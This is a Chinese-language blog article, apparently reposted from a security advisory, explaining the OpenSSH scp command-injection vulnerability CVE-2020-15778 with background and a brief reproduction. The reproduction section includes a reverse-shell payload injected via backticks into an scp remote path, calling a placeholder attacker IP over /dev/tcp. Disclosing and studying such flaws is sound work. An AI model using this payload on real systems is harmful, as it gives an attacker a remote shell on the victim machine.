OpenSSH命令注入漏洞CVE-2020-15778的怎么理解

本篇文章给大家分享的是有关 OpenSSH命令注入漏洞CVE-2020-15778的怎么理解,小编觉得挺实用的,因此分享给大家学习,希望大家阅读完这篇文章后可以有所收获,话不多说,跟着小编一起来看看吧。

一、漏洞概要

2020年6月9日,研究人员Chinmay Pandya在Openssh中发现了一个漏洞,于7月18日公开。OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告。

二、漏洞分析

2.1 OpenSSH介绍
OpenSSH是用于使用SSH协议进行远程登录的一个开源实现。通过对交互的流量进行加密防止窃听,连接劫持以及其他攻击。OpenSSH由OpenBSD项目的一些开发人员开发, 并以BSD样式的许可证提供,且已被集成到许多商业产品中。
2.2 漏洞描述
研究人员Chinmay Pandya在openssh的scp组件中发现了一个命令注入漏洞。OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。
2.2.1 scp命令简介
scp 是 secure copy 的缩写。在linux系统中,scp用于linux之间复制文件和目录,基于 ssh 登陆进行安全的远程文件拷贝命令。该命令由openssh的scp.c及其他相关代码实现。
2.2.2 漏洞复现
scp命令引发的命令注入

反弹shell的payload

scp 1.txt cracer@受害机ip:'`bash -i >& /dev/tcp/攻击机ip/4444 0>&1`/tmp/test.txt'

实战测试,这里使用本机进行测试
1、查看ssh版本,符合漏洞版本

ssh -V

OpenSSH命令注入漏洞CVE-2020-15778的怎么理解

2、先在本地新建好文件,用于上传

OpenSSH命令注入漏洞CVE-2020-15778的怎么理解

3、本地开启监听

OpenSSH命令注入漏洞CVE-2020-15778的怎么理解

3、使用scp命令注入成功反弹shellOpenSSH命令注入漏洞CVE-2020-15778的怎么理解OpenSSH命令注入漏洞CVE-2020-15778的怎么理解

以上就是 OpenSSH命令注入漏洞CVE-2020-15778的怎么理解,小编相信有部分知识点可能是我们日常工作会见到或用到的。希望你能通过这篇文章学到更多知识。更多详情敬请关注亿速云行业资讯频道。

原创文章,作者:kepupublish,如若转载,请注明出处:https://blog.ytso.com/tech/safety/220530.html

(0)
上一篇 2022年1月2日 22:00
下一篇 2022年1月2日 22:00

相关推荐

发表回复

登录后才能评论